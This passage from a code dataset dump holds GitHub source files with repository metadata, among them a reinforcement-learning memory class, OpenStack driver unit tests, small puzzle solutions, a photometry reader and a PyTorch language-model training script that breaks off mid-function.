print(site)\n # print(site_info[site][0], site_info[site][1])\n total_assigned += (site_bandwidth[site] - site_info[site][1])\n if site_info[site][1] < 0:\n print("Upper limit exceeded")\n solution.close()\n os.remove(output_path)\n sys.exit()\n\n print(total_demand)\n print(total_assigned)\n\n if total_demand != total_assigned:\n print("allocation mismatch")\n solution.close()\n os.remove(output_path)\n sys.exit()\n \n # breakpoint()\n\n solution.close()\n # os.remove(output_path)\n\n","repo_name":"Rodger-Huang/2022HUAWEIChallenge","sub_path":"preliminary_contest/SDK_python/CodeCraft-2022/src/CodeCraft_2022_1373918.py","file_name":"CodeCraft_2022_1373918.py","file_ext":"py","file_size_in_byte":8064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33211355224","text":"from collections import deque\nimport torch\n\nfrom config import Config\n\nclass ShortTermMemory():\n def __init__(self, glow):\n \"\"\"\n Short term memory contains memorized experience as observation, action and target h-value. All as torch.Tensors.\n It also contains the history of observations, actions, h-values and rewards.\n Memories are added from the history through backpropagation of the reward via a glow mechanism. \n Additionally, we can add fake experience used for training decoders on the policy of an agent. \n That is, experience which corresponds to h-values that should be 0.\n\n Args:\n glow (float): Glow value which determines how much a reward is backpropagated.\n \"\"\"\n self.glow = glow\n #:class:`collections.deque` of :obj:`tuple`: Short term memory. Short term experiences are stored here.\n self.memory = deque()\n #:class:`collections.deque` of :obj:`tuple`: Short term memory. Fake short term experiences are stored here.\n self.memory_fake = deque()\n #:class:`list` of :obj:`tuple`: History of observations, actions, h-values and rewards.\n self.history = list()\n #:class:`list` of :obj:`bool`: List of flags associated with experiences to be remembered.\n self.flags = list()\n\n def create_experience(self):\n \"\"\"\n Creates experience from history by backpropagating rewards and adds experience to the memory.\n Does not reset history or memory before or after.\n \"\"\"\n current_reward = 0\n for i, hist in enumerate(reversed(self.history)):\n observation, action, hval, reward = hist\n is_saved = self.flags[-i-1]\n current_reward *= (1-self.glow)\n if reward:\n current_reward += reward\n if abs(current_reward) > Config.REWARD_CLIP_VALUE and is_saved:\n if Config.TRAIN_MODE == 'policy':\n target = (1 - Config.GAMMA) * hval + current_reward\n elif Config.TRAIN_MODE == 'selection':\n target = torch.DoubleTensor([current_reward * Config.REWARD_RESCALE])\n self.memory.appendleft((observation, action, target.view(1,1)))\n\n def add_event(self, event, flag=True):\n \"\"\"\n Adds an event to the history.\n\n Args:\n event (tuple): Tuple consisting of observation, action, h-value and reward.\n flag (bool, optional): Whether or not this event will be used for training. Default: True.\n \"\"\"\n self.history.append(event)\n self.flags.append(flag)\n\n def add_experience_fake(self, observation, action, reward):\n \"\"\"\n Creates fake experience by hand. 
Appends an event to deque.\n\n Args:\n observation (torch.Tensor): State of environment.\n action (torch.Tensor): Encoded action that is being performed.\n reward (float): Discounted reward for this experience.\n \"\"\"\n target = torch.DoubleTensor([0.])\n self.memory_fake.append((observation, action, target.view(1,1)))\n\n def reset_memory(self):\n \"\"\"\n Resets memory.\n \"\"\"\n self.memory = deque()\n \n def reset_history(self):\n \"\"\"\n Resets history and associated flags.\n \"\"\"\n self.history = list()\n self.flags = list()\n \n def reset(self):\n \"\"\"\n Resets history, memories and flags.\n \"\"\"\n self.memory = deque()\n self.memory_fake = deque()\n self.history = list()\n self.flags = list()\n","repo_name":"HendrikPN/reinforced_scinet","sub_path":"reinforced_scinet/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"582225509","text":"# -*- coding: utf-8 -*-\nimport uuid\n\n\nclass Issue():\n ''' Represents an Issue '''\n\n def __init__(\n self, id, title, content,\n status, date_created, user, private, attachment, tags,\n depends, blocks, assignee, close_status, comments=None,\n milestone=None, custom_fields=None, priority=None):\n\n self.id = id\n self.title = title\n self.content = content\n self.status = status\n self.close_status = close_status\n self.date_created = date_created\n self.user = user\n self.private = private\n self.attachment = attachment\n self.tags = tags\n self.depends = depends\n self.blocks = blocks\n self.assignee = assignee\n self.comments = comments\n self.uid = uuid.uuid4().hex\n self.milestone = milestone\n self.custom_fields = custom_fields if custom_fields else []\n self.priority = priority\n\n def to_json(self):\n ''' Returns a dictionary representation of the issue.\n\n '''\n output = {\n 'id': self.id,\n 'title': self.title,\n 'content': self.content,\n 'status': self.status,\n 'close_status': self.close_status,\n 'date_created': self.date_created,\n 'user': self.user,\n 'private': self.private,\n 'tags': self.tags,\n 'depends': self.depends,\n 'blocks': self.blocks,\n 'assignee': self.assignee,\n 'comments': self.comments,\n 'milestone': self.milestone,\n 'custom_fields': self.custom_fields,\n 'priority': self.priority\n }\n\n return output\n\n @property\n def isa(self):\n return 'issue'\n\n\nclass IssueComment():\n ''' Represent a comment for an issue '''\n\n def __init__(\n self, id, comment, date_created,\n user, attachment, parent=None, edited_on=None, editor=None,\n changes=None):\n\n self.id = id\n self.comment = comment\n self.parent = parent\n self.date_created = date_created\n self.user = user\n self.attachment = attachment\n self.edited_on = edited_on\n self.editor = editor\n self.changes = changes\n if not changes:\n self.changes = {}\n\n def to_json(self):\n ''' Returns a dictionary representation of the issue. 
'''\n\n output = {\n 'id': self.id,\n 'comment': self.comment,\n 'parent': self.parent,\n 'date_created': self.date_created,\n 'user': self.user,\n 'edited_on': self.edited_on if self.edited_on else None,\n 'editor': self.editor or None\n }\n\n if len(self.changes) > 0:\n ctext = '\\n'\n for change in self.changes:\n ctext += '\\n%s: %s => %s' % (change, self.changes[change][0],\n self.changes[change][1])\n output['comment'] += ctext\n\n return output\n\n\nclass User():\n ''' Represents a User '''\n\n def __init__(\n self, name, emails,\n fullname=None):\n self.name = name\n self.fullname = fullname\n self.emails = emails\n\n def to_json(self):\n ''' Return a representation of the User in a dictionary. '''\n\n output = {\n 'name': self.name,\n 'fullname': self.fullname,\n 'emails': self.emails\n }\n\n return output\n","repo_name":"vivekanand1101/pagure-importer","sub_path":"pagure_importer/utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"14816075459","text":"\n\n\n\nfrom caffe2.python import core, workspace\nfrom caffe2.proto import caffe2_pb2\nimport time\n\nSHAPE_LEN = 4096\nNUM_ITER = 1000\nGB = 1024 * 1024 * 1024\nNUM_REPLICAS = 48\n\n\ndef build_net(net_name, cross_socket):\n init_net = core.Net(net_name + \"_init\")\n init_net.Proto().type = \"async_scheduling\"\n numa_device_option = caffe2_pb2.DeviceOption()\n numa_device_option.device_type = caffe2_pb2.CPU\n numa_device_option.numa_node_id = 0\n for replica_id in range(NUM_REPLICAS):\n init_net.XavierFill([], net_name + \"/input_blob_\" + str(replica_id),\n shape=[SHAPE_LEN, SHAPE_LEN], device_option=numa_device_option)\n\n net = core.Net(net_name)\n net.Proto().type = \"async_scheduling\"\n if cross_socket:\n numa_device_option.numa_node_id = 1\n for replica_id in range(NUM_REPLICAS):\n net.Copy(net_name + \"/input_blob_\" + str(replica_id),\n net_name + \"/output_blob_\" + str(replica_id),\n device_option=numa_device_option)\n return init_net, net\n\n\ndef main():\n assert workspace.IsNUMAEnabled() and workspace.GetNumNUMANodes() >= 2\n\n single_init, single_net = build_net(\"single_net\", False)\n cross_init, cross_net = build_net(\"cross_net\", True)\n\n workspace.CreateNet(single_init)\n workspace.RunNet(single_init.Name())\n workspace.CreateNet(cross_init)\n workspace.RunNet(cross_init.Name())\n\n workspace.CreateNet(single_net)\n workspace.CreateNet(cross_net)\n\n for _ in range(4):\n t = time.time()\n workspace.RunNet(single_net.Name(), NUM_ITER)\n dt = time.time() - t\n print(\"Single socket time:\", dt)\n single_bw = 4 * SHAPE_LEN * SHAPE_LEN * NUM_REPLICAS * NUM_ITER / dt / GB\n print(\"Single socket BW: {} GB/s\".format(single_bw))\n\n t = time.time()\n workspace.RunNet(cross_net.Name(), NUM_ITER)\n dt = time.time() - t\n print(\"Cross socket time:\", dt)\n cross_bw = 4 * SHAPE_LEN * SHAPE_LEN * NUM_REPLICAS * NUM_ITER / dt / GB\n print(\"Cross socket BW: {} GB/s\".format(cross_bw))\n print(\"Single BW / Cross BW: {}\".format(single_bw / cross_bw))\n\n\nif __name__ == '__main__':\n core.GlobalInit([\"caffe2\", \"--caffe2_cpu_numa_enabled=1\"])\n main()\n","repo_name":"pytorch/pytorch","sub_path":"caffe2/python/numa_benchmark.py","file_name":"numa_benchmark.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"19922195706","text":"#!/usr/bin/env python\n\nimport fandango as 
fn\n\ndevs = fn.tango.get_class_devices('HdbEventSubscriber')\n\nfor d in devs:\n try:\n if not fn.check_device(d):\n fn.Astor(d).stop_servers()\n fn.Astor(d).start_servers()\n else:\n # Wait to next iteration before setting polling\n dp = fn.get_device(d)\n dp.poll_command('start',1200000)\n print(d,'done')\n except:\n print(fn.getLastException())\n","repo_name":"GitContainer/PyTangoArchiving","sub_path":"PyTangoArchiving/scripts/start_hdbpp_archivers.py","file_name":"start_hdbpp_archivers.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"38100166514","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\nimport random\n\nimport mock\n\nfrom oslo_utils import uuidutils\n\nfrom omnipath.db import api as db_api\nfrom omnipath.tests.unit import base\n\n\nclass TestOmniPathMechanismDriver(base.TestOmniPathBase, base.DBTestCase):\n\n def setUp(self):\n super(TestOmniPathMechanismDriver, self).setUp()\n\n def _get_fake_network_context(self):\n current = {'status': 'ACTIVE',\n 'subnets': [],\n 'name': 'net1',\n 'provider:physical_network': None,\n 'admin_state_up': True,\n 'tenant_id': 'test-tenant',\n 'provider:network_type': 'vlan',\n 'shared': False,\n 'id': uuidutils.generate_uuid(),\n 'provider:segmentation_id': random.randint(2, 2000)}\n context = mock.Mock(current=current)\n context.session = self.session\n context._plugin_context = self.db_context\n return context\n\n def _get_fake_port_context(self):\n fake_net = self._get_fake_network_context()\n current = {'status': 'DOWN',\n 'binding:host_id': '',\n 'allowed_address_pairs': [],\n 'device_owner': 'fake_owner',\n 'binding:profile': {'guid': 'fake_guid'},\n 'fixed_ips': [{\n 'subnet_id': uuidutils.generate_uuid()}],\n 'id': uuidutils.generate_uuid(),\n 'device_id': 'fake_device',\n 'name': '',\n 'admin_state_up': True,\n 'network_id': fake_net.current['id'],\n 'tenant_id': fake_net.current['tenant_id'],\n 'binding:vif_details': {},\n 'binding:vnic_type': 'baremetal',\n 'binding:vif_type': 'unbound',\n 'mac_address': 'fake_mac'}\n context = mock.Mock(current=current)\n context.network = fake_net\n context.session = self.session\n context._plugin_context = self.db_context\n return context\n\n def _assert_resource_row(self, context, res_op, res_type):\n result = db_api.get_resource_row(context, context.current['id'],\n res_type)\n self.assertEqual(result.data, context.current)\n self.assertEqual(result.data['operation'], res_op)\n\n def test_network_create_precommit(self):\n context = self._get_fake_network_context()\n self.mech_driver.create_network_precommit(context)\n self._assert_resource_row(context, \"create\", \"network\")\n\n def test_network_delete_precommit(self):\n context = self._get_fake_network_context()\n self.mech_driver.create_network_precommit(context)\n self.mech_driver.delete_network_precommit(context)\n self._assert_resource_row(context, \"delete\", \"network\")\n\n def test_port_create_precommit(self):\n context = 
self._get_fake_port_context()\n self.mech_driver.create_port_precommit(context)\n self._assert_resource_row(context, \"create\", \"port\")\n\n def test_port_delete_precommit(self):\n context = self._get_fake_port_context()\n self.mech_driver.create_port_precommit(context)\n self.mech_driver.delete_port_precommit(context)\n self._assert_resource_row(context, \"delete\", \"port\")\n\n def test__is_port_supported(self):\n context = self._get_fake_port_context()\n is_supported = self.mech_driver._is_port_supported(context.current)\n self.assertTrue(is_supported)\n\n def test__is_port_supported_false(self):\n context = self._get_fake_port_context()\n context.current['binding:vnic_type'] = 'not_baremetal'\n is_supported = self.mech_driver._is_port_supported(context.current)\n self.assertFalse(is_supported)\n\n def test_db_multiple_rows_get(self):\n ctx_net1 = self._get_fake_network_context()\n ctx_net2 = self._get_fake_network_context()\n self.mech_driver.create_network_precommit(ctx_net1)\n self.mech_driver.create_network_precommit(ctx_net2)\n res = db_api.get_all_entries_by_state(ctx_net2, \"pending\")\n self.assertEqual(2, len(res))\n db_api.update_multiple_rows(ctx_net2, \"completed\",\n [ctx_net1.current['id'],\n ctx_net2.current['id']])\n res2 = db_api.get_all_entries_by_state(ctx_net2, \"completed\")\n self.assertEqual(2, len(res2))\n for row in res2:\n self.assertEqual(\"completed\", row.state)\n\n def test_all_postcommits(self):\n with mock.patch.object(\n self.mech_driver.omnipath_thread, \"set_sync_event\") \\\n as mock_sync:\n self.mech_driver.create_network_postcommit(mock.ANY)\n self.mech_driver.delete_network_postcommit(mock.ANY)\n self.mech_driver.create_port_postcommit(mock.ANY)\n self.mech_driver.delete_port_postcommit(mock.ANY)\n # call count should be 3 since create_port doesn't set_sync_event\n self.assertEqual(3, mock_sync.call_count)\n\n @mock.patch('neutron.db.provisioning_blocks.provisioning_complete')\n def test_bind_port(self, mock_pb):\n ctx_port = self._get_fake_port_context()\n ctx_port.segments_to_bind = [{'id': 'fake_segment'}]\n ctx_port.set_binding = mock.Mock()\n with mock.patch.object(\n self.mech_driver.omnipath_thread, \"set_sync_event\") \\\n as mock_bind:\n self.mech_driver.create_port_precommit(ctx_port)\n self.mech_driver.bind_port(ctx_port)\n self.assertTrue(mock_bind.called)\n self.assertTrue(mock_pb.called)\n","repo_name":"manjeetbhati/networking-omnipath","sub_path":"omnipath/tests/unit/mechanism_driver/test_mech_omnipath.py","file_name":"test_mech_omnipath.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15126616949","text":"N = int(input())\r\nA = list(map(int, input().split()))\r\n\r\nK = sum(A) / sum(range(1, N+1))\r\nD = []\r\nfor i in range(-1,N-1):\r\n D.append(A[i+1] - A[i] - K )\r\n\r\nfor d in D:\r\n if not (d <= 0 and d % N == 0):\r\n print(\"NO\")\r\n break\r\nelse:\r\n print(\"YES\")","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc010/B/4575807.py","file_name":"4575807.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"23380637244","text":"from copy import deepcopy\nfrom random import gauss, choice\nfrom string import printable\n\n##### Neighbors Generator #####\nclass Neighbors():\n\n\tdef __init__(self, individual_size, values):\n\t\tself.individual_size = individual_size\n\t\tself.values = 
values\n\n\t##### Binary genotype #####\n\tdef binary(self, individual):\n\t\tneighbors = []\n\t\tfor i in range(self.individual_size):\n\t\t\tneighbor = {'gen':deepcopy(individual['gen'])}\n\t\t\tneighbor['gen'][i] ^= 1\n\t\t\tneighbors.append(neighbor)\n\t\treturn neighbors\n\t###########################\n\n\t##### Methinks ######\n\tdef methinks(self, individual):\n\t\tneighbors = []\n\t\tfor i in range(self.individual_size):\n\t\t\tneighbor = {'gen':deepcopy(individual['gen'])}\n\t\t\tif neighbor['gen'][i] == printable[0]:\n\t\t\t\tneighbor['gen'][i] = printable[1]\n\t\t\telif neighbor['gen'][i] == printable[-1]:\n\t\t\t\tneighbor['gen'][i] = printable[-2]\n\t\t\telse:\n\t\t\t\tneighbor['gen'][i] = printable[printable.index(neighbor['gen'][i])+choice([-1,1])]\n\t\t\tneighbors.append(neighbor)\n\t\treturn neighbors\n\t#####################\n\n\t##### Rastrigin #####\n\tdef rastrigin(self, individual):\n\t\tneighbors = []\n\t\tfor i in range(self.individual_size):\n\t\t\tneighbor = {'gen':deepcopy(individual['gen'])}\n\t\t\tneighbor['gen'][i] += gauss(0, self.values['sigma'])\n\t\t\tif neighbor['gen'][i] > 5.12: neighbor['gen'][i] = 5.12\n\t\t\telif neighbor['gen'][i] < -5.12: neighbor['gen'][i] = -5.12\n\t\t\tneighbors.append(neighbor)\n\t\treturn neighbors\n\t#####################\n","repo_name":"valenca/Evolutionary-Computation-Engine","sub_path":"ECLib/Library/neighbors.py","file_name":"neighbors.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11134893763","text":"inp = [line.strip() for line in open('input02.txt', encoding='utf8')]\n\ntotal_paper = 0\ntotal_ribbon = 0\n\ndef calculate_paper_and_ribbon_needed(l, w, h):\n side1 = l*w\n side2 = w*h\n side3 = h*l\n ribbon = l*w*h + 2*sum(sorted([l, w, h])[:2])\n paper = 2*side1+2*side2+2*side3+min([side1, side2, side3])\n return (paper, ribbon)\n\nfor i in inp:\n l, w, h = [int(x) for x in i.split('x')]\n results = calculate_paper_and_ribbon_needed(l, w, h)\n total_paper += results[0]\n total_ribbon += results[1]\n\nprint(\"Solution for part1:\", total_paper)\nprint(\"Solution for part2:\", total_ribbon)\n","repo_name":"micr0cuts/challenges","sub_path":"advent-of-code-2015/solution02.py","file_name":"solution02.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30924236526","text":"import linecache\nreadfile = open('/Users/weixinping/Downloads/find.sql','r')\nwritefile = open('/Users/weixinping/Downloads/table.sql','w')\nstart = {}\ni = 1\nlines = readfile.readlines()\nstart_index = 0\nstop_index = 0\nfor i in range(0,len(lines)):\n if lines[i].find('#181212')==0 and lines[i].find('Write_rows') >0 :\n start_index = i\n elif lines[i].find('# at ') ==0:\n if start_index != 0:\n stop_index = i\n text = ''.join(lines[start_index:stop_index])\n if text.find('t_user_data_supply_status') > 0:\n writefile.write(text)\n start_index = 0\n stop_index = 0\nreadfile.close()\nwritefile.close()","repo_name":"weixp/mysql_query","sub_path":"analyse_binlog.py","file_name":"analyse_binlog.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8903310109","text":"import re\n\nimport PdfConverter\n\nclass PdfAddress:\n\n def get_address(self, pdfconverter):\n raw_addr = self.get_address_raw(pdfconverter)\n return re.sub(r'^中国', '', 
string=raw_addr)\n\n def get_address_raw(self, pdfconverter):\n FILE = pdfconverter.get_FILE()\n address = \"\"\n text_list = []\n in_table = False\n for line in FILE:\n if in_table:\n text_list.append(line)\n if re.search('公司网址', line):\n break\n if re.search('邮政编码', line):\n break\n\n if re.search('办公地址', line):\n in_table = True\n shortline = re.sub('.*?办公地址', '', line)\n text_list.append(shortline)\n\n\n text = ''.join(text_list)\n text = re.sub(' ', ' ', string=text)\n text = re.sub('
', ', string=text)\n\n match = re.search('[\\w()·]+', text)\n if match is None:\n return ""\n\n return re.sub('[()·]+', '', match.group(0))\n\n\nif __name__ == '__main__':\n\n filename = "001979_2016.PDF"\n pdfconverter = PdfConverter.PdfFileConverter('../reports/year/2016/0019', filename)\n\n pdfaddress = PdfAddress()\n address = pdfaddress.get_address(pdfconverter)\n print(address)\n\n pdfconverter.close()\n","repo_name":"flyeagles/china_annual_report_parser","sub_path":"PdfAddress.py","file_name":"PdfAddress.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9913216897","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n max_count = 0\n left = 0\n charts = set()\n for right in range(len(s)):\n if s[right] not in charts:\n max_count = max(max_count, right - left + 1)\n else:\n while s[right] in charts:\n charts.remove(s[left])\n left += 1\n charts.add(s[right])\n return max_count\n\n\nif __name__ == \"__main__\":\n print(Solution().lengthOfLongestSubstring(\"abcabcbb\"))\n","repo_name":"Pravuk/leetcode_practice","sub_path":"longest_substr_w_o_repeating_chars.py","file_name":"longest_substr_w_o_repeating_chars.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20942577271","text":"import xlrd\nimport numpy as np\n\n# Allows extraction of photometry data from a .xlsx file. \n# INPUT\n# loc: .xlsx file path on your PC. E.g.: loc = (\"/home/guifress/pdo/data/TOI-1266_TJO_R.xlsx\"). \n# org: list with 4 integers. org[0] = #{data points}, org[1] = #{target stars}, org[2] = #{comp. stars}, \n# org[3] = total number of stars. \n# ind: list with 2 elements. Each element is a list of integers corresponding to column numbers for...\n# i. target stars rel. fluxes. \n# ii. comp. stars rel. fluxes. \n# [Obs.: in ind, we consider the first column of the .xlsx file to be column 1, NOT 0].\n\n# OUTPUT: a list with 8 elements (np.arrays). #{data points} = dp\n# 1. BJD. Dim.: 1 x dp.\n# 2. AIRMASS. Dim.: 1 x dp.\n# 3. REL_FLUX_T. Dim.: #{targets} x dp.\n# 4. REL_FLUX_T_ERR. Dim.: #{targets} x dp. \n# 5. REL_FLUX_SNR_T. Dim.: #{targets} x dp.\n# 6. REL_FLUX_C. Dim.: #{comp. stars} x dp. \n# 7. REL_FLUX_C_ERR. Dim.: #{comp. stars} x dp. \n# 8. REL_FLUX_SNR_C. Dim.: #{comp. stars} x dp. 
\ndef photometry(loc,org,ind):\n wb = xlrd.open_workbook(loc)\n sheet = wb.sheet_by_index(0)\n\n size = org[0]\n targets = org[1]\n comparison = org[2]\n total = org[3]\n BJD = np.zeros((1,size))\n AIRMASS = np.zeros((1,size))\n REL_FLUX_T = np.zeros((targets,size))\n REL_FLUX_T_ERR = np.zeros((targets,size))\n \n REL_FLUX_C = np.zeros((comparison,size))\n REL_FLUX_C_ERR = np.zeros((comparison,size))\n \n REL_FLUX_SNR_T = np.zeros((targets,size))\n REL_FLUX_SNR_C = np.zeros((comparison,size))\n \n target_index = ind[0]\n target_err_index = []\n target_snr_index = []\n for i in range(0,targets): target_err_index.append(ind[0][i] + total)\n for i in range(0,targets): target_snr_index.append(ind[0][i] + 2 * total)\n \n comp_index = ind[1]\n comp_err_index = []\n comp_snr_index = []\n for i in range(0,comparison): comp_err_index.append(ind[1][i] + total)\n for i in range(0,comparison): comp_snr_index.append(ind[1][i] + 2 * total)\n \n #print(comp_snr_index)\n\n for i in range(0,size):\n BJD[0][i] = sheet.cell_value(i + 1,8)\n AIRMASS[0][i] = sheet.cell_value(i + 1,9)\n for k in range(0,targets):\n REL_FLUX_T[k][i] = sheet.cell_value(i + 1,target_index[k] - 1)\n REL_FLUX_T_ERR[k][i] = sheet.cell_value(i + 1,target_err_index[k] - 1)\n REL_FLUX_SNR_T[k][i] = sheet.cell_value(i + 1,target_snr_index[k] - 1)\n for k in range(0,comparison):\n REL_FLUX_C[k][i] = sheet.cell_value(i + 1,comp_index[k] - 1)\n REL_FLUX_C_ERR[k][i] = sheet.cell_value(i + 1,comp_err_index[k] - 1)\n REL_FLUX_SNR_C[k][i] = sheet.cell_value(i + 1,comp_snr_index[k] - 1)\n\n result = [BJD,AIRMASS,REL_FLUX_T,REL_FLUX_T_ERR,REL_FLUX_SNR_T,REL_FLUX_C,REL_FLUX_C_ERR,REL_FLUX_SNR_C]\n return result\n\n\n# Allows reading aperture peak pixel counts from both target and comparison stars. \n# Input variables are the same as in read.photometry.\ndef peak_values(loc,org,ind):\n wb = xlrd.open_workbook(loc)\n sheet = wb.sheet_by_index(0)\n\n size = org[0]\n targets = org[1]\n comparison = org[2]\n total = org[3]\n \n T_PEAKS = np.zeros((targets,size))\n C_PEAKS = np.zeros((comparison,size))\n\n for i in range(0,size):\n for k in range(0,targets):\n star_number = ind[0][k] - ind[0][0] + 1\n if k == 0: T_PEAKS[k][i] = sheet.cell_value(i + 1,(ind[0][0] + total - 1) - 1 + 2 * total + 2 + 11)\n if k != 0: T_PEAKS[k][i] = sheet.cell_value(i + 1,(ind[0][0] + total - 1) - 1 + 2 * total + 2 + 20 + 10 + 18 * (star_number - 2))\n \n for k in range(0,comparison):\n star_number = ind[1][k] - ind[0][0] + 1\n C_PEAKS[k][i] = sheet.cell_value(i + 1,(ind[0][0] + total - 1) - 1 + 2 * total + 2 + 20 + 10 + 18 * (star_number - 2))\n \n return [T_PEAKS,C_PEAKS]\n \n\n \n \n \n \n","repo_name":"GuifreSanchez/photometry-data-optimization","sub_path":"modules/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40411110642","text":"# Import\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport torchtext\nfrom torchtext.data.utils import get_tokenizer\nimport torchtext.data as data\nfrom torchtext.vocab import build_vocab_from_iterator, GloVe, vocab\nfrom torchtext.datasets import WikiText2, WikiText103\n\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom torch import optim\nfrom torch.nn import functional as F\nfrom torch.nn.utils.rnn import pad_sequence\n\nimport tqdm\nimport torchmetrics as tm\n\nimport config\nfrom utils import *\nfrom config import *\nfrom dataset import *\nfrom 
model import LanguageModel\nfrom train_eval import train_one_epoch, evaluate\n\nimport wandb\n\nimport math\n\n\ndef main():\n # Set the random seed manually for reproducibility.\n np.random.seed(100)\n torch.manual_seed(100)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(100)\n\n # Create a vocabulary\n train_iter, valid_iter, test_iter = WikiText2('./data/')\n tokenizer = get_tokenizer('basic_english')\n\n if config.pretrained:\n glove = GloVe(name='6B', dim=config.glove_dim)\n vocabulary = vocab(glove.stoi, min_freq=0)\n vocabulary.set_default_index(vocabulary['unk'])\n embedding_pretrained = glove\n else:\n vocabulary = build_vocab_from_iterator(map(tokenizer, train_iter), min_freq=0, specials=[''])\n vocabulary.append_token('')\n vocabulary.set_default_index(vocabulary[''])\n torch.save(vocabulary, 'vocab.pt')\n # glove = GloVe(name='6B', dim=config.glove_dim)\n # embedding_pretrained = glove\n embedding_pretrained = None\n\n vocab_size = len(vocabulary)\n\n X_train, y_train = data_process(tokenizer, vocabulary, train_iter, config.batch_size, config.seq_len, int(config.seq_len/2))\n X_valid, y_valid = data_process(tokenizer, vocabulary, valid_iter, config.batch_size, config.seq_len, config.seq_len)\n # X_test, y_test = data_process(tokenizer, vocabulary, test_iter, config.batch_size * 2, config.seq_len)\n\n train_set = LanguageModelDataset(X_train, y_train)\n valid_set = LanguageModelDataset(X_valid, y_valid)\n # test_set = LanguageModelDataset(X_test, y_test)\n\n train_loader = DataLoader(train_set, batch_size=config.batch_size, shuffle=True)\n valid_loader = DataLoader(valid_set, batch_size=config.batch_size, shuffle=False)\n\n model = LanguageModel(vocab_size, embedding_dim, hidden_dim, num_layers, 0.4, 0.25, 0.4, 0.1,\n pretrained=embedding_pretrained, tied=tie_weights).to(device)\n\n if load_pretrain_model:\n model = torch.load(model_name)\n model.requires_grad_(True)\n num_params = num_trainable_params(model)\n print(f'The model has {num_params:,} trainable parameters!')\n\n optimizer = optim.SGD(model.parameters(), lr=lr, weight_decay=wd)#, momentum=0.9, nesterov=True)\n # optimizer = optim.ASGD(model.parameters(), lr=lr, t0=0, lambd=0.)\n if scheduler:\n lr_scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.9)\n\n loss_fn = nn.CrossEntropyLoss()\n metric = tm.text.Perplexity().to(device)\n\n best_loss_valid = torch.inf\n epoch_counter = 0\n for epoch in range(num_epochs):\n\n # Train\n model, loss_train, metric_train = train_one_epoch(model, train_loader, loss_fn, optimizer, metric, epoch+1)\n\n # Validation\n loss_valid, metric_valid = evaluate(model, valid_loader, loss_fn, metric)\n\n loss_train_hist.append(loss_train)\n loss_valid_hist.append(loss_valid)\n\n metric_train_hist.append(metric_train)\n metric_valid_hist.append(metric_valid)\n\n if loss_valid < best_loss_valid:\n torch.save(model, f'model.pt')\n best_loss_valid = loss_valid\n print('\\nModel Saved!')\n\n print(f'Valid: Loss = {loss_valid:.4}, Metric = {metric_valid:.4}\\n')\n\n epoch_counter += 1\n\n if scheduler:\n lr_scheduler.step()\n\n if wandb_enable:\n wandb.log({\"metric_train\": metric_train, \"loss_train\": loss_train,\n \"metric_valid\": metric_valid, \"loss_valid\": loss_valid})\n else:\n fig, ax = plt.subplots(2, 1)\n ax[0].plot(np.arange(epoch+1), loss_train_hist)\n ax[0].plot(np.arange(epoch+1), loss_valid_hist)\n ax[0].set_title('Loss')\n ax[0].legend(['Train', 'Valid'])\n ax[0].set_xlim(0, num_epochs)\n ax[1].plot(np.arange(epoch+1), metric_train_hist)\n 
